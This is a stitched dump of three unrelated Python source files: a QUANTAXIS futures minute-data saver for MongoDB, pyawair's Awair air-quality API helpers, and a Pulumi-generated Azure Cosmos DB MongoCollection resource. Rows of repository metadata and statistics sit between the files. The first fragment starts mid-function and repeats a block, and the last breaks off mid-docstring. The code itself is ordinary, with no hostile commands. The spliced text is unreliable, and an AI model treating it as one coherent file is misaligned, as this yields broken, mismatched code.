            executor.submit(__saving_work,
                            future_list[i_],
                            coll)
            for i_ in range(len(future_list))
        }  # multi index ./.
        count = 0
        for i_ in concurrent.futures.as_completed(res):
            QA_util_log_info(
                'The {} of Total {}'.format(count,
                                            len(future_list)),
                ui_log=ui_log
            )
            strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
                str(float(count / len(future_list) * 100))[0:4] + '%'
            )
            intLogProgress = int(float(count / len(future_list) * 10000.0))
            QA_util_log_info(
                strLogProgress,
                ui_log=ui_log,
                ui_progress=ui_progress,
                ui_progress_int_value=intLogProgress
            )
            count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_future_min_all(client=DATABASE, ui_log=None, ui_progress=None):
    """save future_min_all (全部, 包含单月合约)

    Incrementally save minute bars for every future contract
    at every frequency (1/5/15/30/60 min).

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- GUI (qt) log hook forwarded to QA_util_log_info
        ui_progress -- GUI (qt) progress hook forwarded to QA_util_log_info
    """
    future_list = QA_fetch_get_future_list().code.unique().tolist()
    coll = client.future_min
    # composite index so incremental queries by code/time stay fast
    coll.create_index(
        [
            ('code',
             pymongo.ASCENDING),
            ('time_stamp',
             pymongo.ASCENDING),
            ('date_stamp',
             pymongo.ASCENDING)
        ]
    )
    err = []
    frequencies = ['1min', '5min', '15min', '30min', '60min']

    def __saving_work(code, coll):
        QA_util_log_info(
            '##JOB13 Now Saving Future_MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            # `freq` instead of `type` to avoid shadowing the builtin
            for freq in frequencies:
                ref_ = coll.find({'code': str(code)[0:6], 'type': freq})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # resume after the most recent stored bar
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Future {} from {} to {} =={} '
                        .format(
                            frequencies.index(freq),
                            str(code),
                            start_time,
                            end_time,
                            freq
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            freq
                        )
                        if len(__data) > 1:
                            # drop row 0: it duplicates the last stored bar
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # nothing stored yet: full download from the default start
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Future {} from {} to {} =={} '
                        .format(
                            frequencies.index(freq),
                            str(code),
                            start_time,
                            end_time,
                            freq
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            freq
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except Exception as error0:
            # was a bare `except:`; keep best-effort semantics but surface
            # the failure and stop swallowing e.g. KeyboardInterrupt
            print(error0)
            err.append(code)

    # context manager guarantees the pool is shut down even on error
    with ThreadPoolExecutor(max_workers=4) as executor:
        res = {
            executor.submit(__saving_work,
                            future_list[i_],
                            coll)
            for i_ in range(len(future_list))
        }  # multi index ./.
        count = 0
        for i_ in concurrent.futures.as_completed(res):
            QA_util_log_info(
                'The {} of Total {}'.format(count,
                                            len(future_list)),
                ui_log=ui_log
            )
            strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
                str(float(count / len(future_list) * 100))[0:4] + '%'
            )
            intLogProgress = int(float(count / len(future_list) * 10000.0))
            QA_util_log_info(
                strLogProgress,
                ui_log=ui_log,
                ui_progress=ui_progress,
                ui_progress_int_value=intLogProgress
            )
            count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
if __name__ == '__main__':
    # Manual entry point: uncomment the savers you want to run.
    # QA_SU_save_stock_day()
    # QA_SU_save_stock_xdxr()
    # QA_SU_save_stock_min()
    # QA_SU_save_stock_transaction()
    # QA_SU_save_index_day()
    # QA_SU_save_stock_list()
    # QA_SU_save_index_min()
    # QA_SU_save_index_list()
    # QA_SU_save_future_list()
    QA_SU_save_future_day()
    QA_SU_save_future_min()
| 33.195677
| 118
| 0.430149
| 16,478
| 173,547
| 4.132419
| 0.025671
| 0.056466
| 0.041222
| 0.072165
| 0.950363
| 0.932285
| 0.926748
| 0.919699
| 0.913311
| 0.896569
| 0
| 0.022395
| 0.478211
| 173,547
| 5,227
| 119
| 33.202028
| 0.729523
| 0.046374
| 0
| 0.786197
| 0
| 0
| 0.07888
| 0.001622
| 0
| 0
| 0
| 0.000957
| 0
| 1
| 0.020518
| false
| 0.002798
| 0.003031
| 0.000233
| 0.024015
| 0.00373
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2947ece7313e9afff8decbf03c8a3ad7d8c40923
| 4,970
|
py
|
Python
|
pyawair/data.py
|
andriykorchak/pyawair
|
5f0bbcfe79712fca467b116ef1dce77317a692b9
|
[
"Apache-2.0"
] | 16
|
2018-07-16T00:15:59.000Z
|
2020-09-06T02:24:40.000Z
|
pyawair/data.py
|
andriykorchak/pyawair
|
5f0bbcfe79712fca467b116ef1dce77317a692b9
|
[
"Apache-2.0"
] | 32
|
2018-07-28T17:07:56.000Z
|
2021-03-22T16:38:02.000Z
|
pyawair/data.py
|
andriykorchak/pyawair
|
5f0bbcfe79712fca467b116ef1dce77317a692b9
|
[
"Apache-2.0"
] | 3
|
2018-07-29T15:58:05.000Z
|
2021-03-18T19:07:54.000Z
|
from pyawair.devices import *
import pyawair.conn
import pyawair.objects
def get_current_air_data(auth, device_name=None, device_type=None, device_id=None):
    """
    Retrieve the most recent air-data sample for one Awair device linked
    to your account.

    :param auth: pyawair.auth.AwairAuth object which contains a valid authentication token
    :param device_type: str which matches the awair device type
    :param device_name: str which matches exactly to the name of a specific device
    :param device_id: str or int which matches the specific awair device internal id number
    :return: Object of Dict type which contains current air data
    """
    if device_type is None or device_id is None:
        # resolve type/id from the device name when not supplied directly
        device = pyawair.objects.AwairDev(device_name, auth)
        device_type, device_id = device.type(), device.id()
    return pyawair.conn.get_data(
        auth,
        device_id,
        device_type,
        "https://developer-apis.awair.is/v1/users/self/devices/",
        "/air-data/latest",
    )
def get_5_min_average(auth, device_name=None, device_type=None, device_id=None, limit=1000,
                      desc=True):
    """
    Retrieve air data averaged over 5-minute periods for one Awair device
    linked to your account.

    :param auth: pyawair.auth.AwairAuth object which contains a valid authentication token
    :param device_type: str which matches the awair device type
    :param device_name: str which matches exactly to the name of a specific device
    :param device_id: str or int which matches the specific awair device internal id number
    :param limit: int that specifies the number of 5-minute periods to query
    :param desc: bool where True specifies descending (newest first) and False specifies
        ascending (oldest first)
    :return: Object of Dict type which contains current air data
    """
    if device_type is None or device_id is None:
        # resolve type/id from the device name when not supplied directly
        device = pyawair.objects.AwairDev(device_name, auth)
        device_type, device_id = device.type(), device.id()
    # the API expects lowercase string booleans in the query string
    query = "?limit={}&desc={}".format(limit, "true" if desc else "false")
    return pyawair.conn.get_data(
        auth,
        device_id,
        device_type,
        "https://developer-apis.awair.is/v1/users/self/devices/",
        "/air-data/5-min-avg",
        query,
    )
def get_15_min_average(auth, device_name=None, device_type=None, device_id=None, limit=1000,
                       desc=True):
    """
    Function to get air data that is averaged over each 15 minutes from a single specific
    Awair Device linked to your account.
    (Docstring fixed: it previously said "5 minutes", copy-pasted from get_5_min_average.)

    :param auth: pyawair.auth.AwairAuth object which contains a valid authentication token
    :param device_type: str which matches the awair device type
    :param device_name: str which matches exactly to the name of a specific device
    :param device_id: str or int which matches the specific awair device internal id number
    :param limit: int that specifies the number of 15-minute periods to query
    :param desc: bool where True specifies descending (newest first) and False specifies
        ascending (oldest first)
    :return: Object of Dict type which contains current air data
    """
    if device_type is None or device_id is None:
        # resolve type/id from the device name when not supplied directly
        awair_device = pyawair.objects.AwairDev(device_name, auth)
        device_type = awair_device.type()
        device_id = awair_device.id()
    base_url = "https://developer-apis.awair.is/v1/users/self/devices/"
    data_url = "/air-data/15-min-avg"
    # the API expects lowercase string booleans in the query string
    desc_param = "true" if desc else "false"
    args = "?limit={}&desc={}".format(limit, desc_param)
    data = pyawair.conn.get_data(auth, device_id, device_type, base_url, data_url, args)
    return data
def get_raw_data(auth, device_name=None, device_type=None, device_id=None):
    """
    Function to get raw (non-averaged) air data from a single specific
    Awair Device linked to your account.
    (Docstring fixed: it previously claimed 5-minute averaging, but this
    endpoint is /air-data/raw.)

    :param auth: pyawair.auth.AwairAuth object which contains a valid authentication token
    :param device_type: str which matches the awair device type
    :param device_name: str which matches exactly to the name of a specific device
    :param device_id: str or int which matches the specific awair device internal id number
    :return: Object of Dict type which contains current air data
    """
    if device_type is None or device_id is None:
        # resolve type/id from the device name when not supplied directly
        awair_device = pyawair.objects.AwairDev(device_name, auth)
        device_type = awair_device.type()
        device_id = awair_device.id()
    base_url = "https://developer-apis.awair.is/v1/users/self/devices/"
    data_url = "/air-data/raw"
    data = pyawair.conn.get_data(auth, device_id, device_type, base_url, data_url)
    return data
| 44.375
| 95
| 0.711268
| 738
| 4,970
| 4.653117
| 0.119241
| 0.081538
| 0.044263
| 0.020967
| 0.964764
| 0.964764
| 0.964764
| 0.964764
| 0.964764
| 0.964764
| 0
| 0.006152
| 0.215091
| 4,970
| 111
| 96
| 44.774775
| 0.874135
| 0.467807
| 0
| 0.784314
| 0
| 0
| 0.139073
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078431
| false
| 0
| 0.058824
| 0
| 0.215686
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2971ce4b79d6bac67495797eb58b18e7a360347a
| 35,816
|
py
|
Python
|
sdk/python/pulumi_azure/cosmosdb/mongo_collection.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/cosmosdb/mongo_collection.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/cosmosdb/mongo_collection.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MongoCollectionArgs', 'MongoCollection']
@pulumi.input_type
# NOTE(review): tfgen-generated class — comments below were added in review
# and will be lost on regeneration.
class MongoCollectionArgs:
    def __init__(__self__, *,
                 account_name: pulumi.Input[str],
                 database_name: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
                 autoscale_settings: Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']] = None,
                 default_ttl_seconds: Optional[pulumi.Input[int]] = None,
                 indices: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 shard_key: Optional[pulumi.Input[str]] = None,
                 throughput: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a MongoCollection resource.
        :param pulumi.Input[str] database_name: The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        :param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
        :param pulumi.Input['MongoCollectionAutoscaleSettingsArgs'] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
        :param pulumi.Input[int] default_ttl_seconds: The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
        :param pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]] indices: One or more `index` blocks as defined below.
        :param pulumi.Input[str] name: Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
        :param pulumi.Input[str] shard_key: The name of the key to partition on for sharding. There must not be any other unique index keys.
        :param pulumi.Input[int] throughput: The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
        """
        # Required args are always stored; optional args only when supplied,
        # so pulumi.get on an unset property returns its absence correctly.
        pulumi.set(__self__, "account_name", account_name)
        pulumi.set(__self__, "database_name", database_name)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        if analytical_storage_ttl is not None:
            pulumi.set(__self__, "analytical_storage_ttl", analytical_storage_ttl)
        if autoscale_settings is not None:
            pulumi.set(__self__, "autoscale_settings", autoscale_settings)
        if default_ttl_seconds is not None:
            pulumi.set(__self__, "default_ttl_seconds", default_ttl_seconds)
        if indices is not None:
            pulumi.set(__self__, "indices", indices)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if shard_key is not None:
            pulumi.set(__self__, "shard_key", shard_key)
        if throughput is not None:
            pulumi.set(__self__, "throughput", throughput)
    # Each property below round-trips its value through pulumi.get/pulumi.set
    # under the camelCase wire name declared in @pulumi.getter.
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Input[str]:
        return pulumi.get(self, "account_name")
    @account_name.setter
    def account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "account_name", value)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)
    @property
    @pulumi.getter(name="analyticalStorageTtl")
    def analytical_storage_ttl(self) -> Optional[pulumi.Input[int]]:
        """
        The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
        """
        return pulumi.get(self, "analytical_storage_ttl")
    @analytical_storage_ttl.setter
    def analytical_storage_ttl(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "analytical_storage_ttl", value)
    @property
    @pulumi.getter(name="autoscaleSettings")
    def autoscale_settings(self) -> Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']]:
        """
        An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
        """
        return pulumi.get(self, "autoscale_settings")
    @autoscale_settings.setter
    def autoscale_settings(self, value: Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']]):
        pulumi.set(self, "autoscale_settings", value)
    @property
    @pulumi.getter(name="defaultTtlSeconds")
    def default_ttl_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
        """
        return pulumi.get(self, "default_ttl_seconds")
    @default_ttl_seconds.setter
    def default_ttl_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "default_ttl_seconds", value)
    @property
    @pulumi.getter
    def indices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]]:
        """
        One or more `index` blocks as defined below.
        """
        return pulumi.get(self, "indices")
    @indices.setter
    def indices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]]):
        pulumi.set(self, "indices", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="shardKey")
    def shard_key(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the key to partition on for sharding. There must not be any other unique index keys.
        """
        return pulumi.get(self, "shard_key")
    @shard_key.setter
    def shard_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "shard_key", value)
    @property
    @pulumi.getter
    def throughput(self) -> Optional[pulumi.Input[int]]:
        """
        The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
        """
        return pulumi.get(self, "throughput")
    @throughput.setter
    def throughput(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "throughput", value)
@pulumi.input_type
class _MongoCollectionState:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl_seconds: Optional[pulumi.Input[int]] = None,
indices: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shard_key: Optional[pulumi.Input[str]] = None,
system_indexes: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionSystemIndexArgs']]]] = None,
throughput: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering MongoCollection resources.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input['MongoCollectionAutoscaleSettingsArgs'] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
:param pulumi.Input[str] database_name: The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] default_ttl_seconds: The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
:param pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]] indices: One or more `index` blocks as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] shard_key: The name of the key to partition on for sharding. There must not be any other unique index keys.
:param pulumi.Input[Sequence[pulumi.Input['MongoCollectionSystemIndexArgs']]] system_indexes: One or more `system_indexes` blocks as defined below.
:param pulumi.Input[int] throughput: The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if analytical_storage_ttl is not None:
pulumi.set(__self__, "analytical_storage_ttl", analytical_storage_ttl)
if autoscale_settings is not None:
pulumi.set(__self__, "autoscale_settings", autoscale_settings)
if database_name is not None:
pulumi.set(__self__, "database_name", database_name)
if default_ttl_seconds is not None:
pulumi.set(__self__, "default_ttl_seconds", default_ttl_seconds)
if indices is not None:
pulumi.set(__self__, "indices", indices)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if shard_key is not None:
pulumi.set(__self__, "shard_key", shard_key)
if system_indexes is not None:
pulumi.set(__self__, "system_indexes", system_indexes)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@analytical_storage_ttl.setter
def analytical_storage_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "analytical_storage_ttl", value)
    @property
    @pulumi.getter(name="autoscaleSettings")
    def autoscale_settings(self) -> Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']]:
        """
        An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
        """
        return pulumi.get(self, "autoscale_settings")
    @autoscale_settings.setter
    def autoscale_settings(self, value: Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']]):
        """Set the `autoscale_settings` input value."""
        pulumi.set(self, "autoscale_settings", value)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: Optional[pulumi.Input[str]]):
        """Set the `database_name` input value."""
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter(name="defaultTtlSeconds")
    def default_ttl_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
        """
        return pulumi.get(self, "default_ttl_seconds")
    @default_ttl_seconds.setter
    def default_ttl_seconds(self, value: Optional[pulumi.Input[int]]):
        """Set the `default_ttl_seconds` input value."""
        pulumi.set(self, "default_ttl_seconds", value)
    @property
    @pulumi.getter
    def indices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]]:
        """
        One or more `index` blocks as defined below.
        """
        return pulumi.get(self, "indices")
    @indices.setter
    def indices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]]):
        """Set the `indices` input value."""
        pulumi.set(self, "indices", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        """Set the `name` input value."""
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        """Set the `resource_group_name` input value."""
        pulumi.set(self, "resource_group_name", value)
    @property
    @pulumi.getter(name="shardKey")
    def shard_key(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the key to partition on for sharding. There must not be any other unique index keys.
        """
        return pulumi.get(self, "shard_key")
    @shard_key.setter
    def shard_key(self, value: Optional[pulumi.Input[str]]):
        """Set the `shard_key` input value."""
        pulumi.set(self, "shard_key", value)
    @property
    @pulumi.getter(name="systemIndexes")
    def system_indexes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionSystemIndexArgs']]]]:
        """
        One or more `system_indexes` blocks as defined below.
        """
        return pulumi.get(self, "system_indexes")
    @system_indexes.setter
    def system_indexes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionSystemIndexArgs']]]]):
        """Set the `system_indexes` value."""
        pulumi.set(self, "system_indexes", value)
    @property
    @pulumi.getter
    def throughput(self) -> Optional[pulumi.Input[int]]:
        """
        The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
        """
        return pulumi.get(self, "throughput")
    @throughput.setter
    def throughput(self, value: Optional[pulumi.Input[int]]):
        """Set the `throughput` input value."""
        pulumi.set(self, "throughput", value)
class MongoCollection(pulumi.CustomResource):
    """Manages a Mongo Collection within a Cosmos DB Account.

    NOTE(review): this class follows the Pulumi provider codegen layout —
    two typed `__init__` overloads dispatching to `_internal_init`; keep the
    structure in sync with the code generator.
    """
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
                 autoscale_settings: Optional[pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']]] = None,
                 database_name: Optional[pulumi.Input[str]] = None,
                 default_ttl_seconds: Optional[pulumi.Input[int]] = None,
                 indices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 shard_key: Optional[pulumi.Input[str]] = None,
                 throughput: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        """
        Manages a Mongo Collection within a Cosmos DB Account.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_azure as azure
        example_account = azure.cosmosdb.get_account(name="tfex-cosmosdb-account",
            resource_group_name="tfex-cosmosdb-account-rg")
        example_mongo_database = azure.cosmosdb.MongoDatabase("exampleMongoDatabase",
            resource_group_name=example_account.resource_group_name,
            account_name=example_account.name)
        example_mongo_collection = azure.cosmosdb.MongoCollection("exampleMongoCollection",
            resource_group_name=example_account.resource_group_name,
            account_name=example_account.name,
            database_name=example_mongo_database.name,
            default_ttl_seconds=777,
            shard_key="uniqueKey",
            throughput=400,
            indices=[azure.cosmosdb.MongoCollectionIndexArgs(
                keys=["_id"],
                unique=True,
            )])
        ```
        ## Import
        CosmosDB Mongo Collection can be imported using the `resource id`, e.g.
        ```sh
         $ pulumi import azure:cosmosdb/mongoCollection:MongoCollection collection1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.DocumentDB/databaseAccounts/account1/mongodbDatabases/db1/collections/collection1
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
        :param pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
        :param pulumi.Input[str] database_name: The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        :param pulumi.Input[int] default_ttl_seconds: The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]] indices: One or more `index` blocks as defined below.
        :param pulumi.Input[str] name: Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] shard_key: The name of the key to partition on for sharding. There must not be any other unique index keys.
        :param pulumi.Input[int] throughput: The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: MongoCollectionArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Mongo Collection within a Cosmos DB Account.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_azure as azure
        example_account = azure.cosmosdb.get_account(name="tfex-cosmosdb-account",
            resource_group_name="tfex-cosmosdb-account-rg")
        example_mongo_database = azure.cosmosdb.MongoDatabase("exampleMongoDatabase",
            resource_group_name=example_account.resource_group_name,
            account_name=example_account.name)
        example_mongo_collection = azure.cosmosdb.MongoCollection("exampleMongoCollection",
            resource_group_name=example_account.resource_group_name,
            account_name=example_account.name,
            database_name=example_mongo_database.name,
            default_ttl_seconds=777,
            shard_key="uniqueKey",
            throughput=400,
            indices=[azure.cosmosdb.MongoCollectionIndexArgs(
                keys=["_id"],
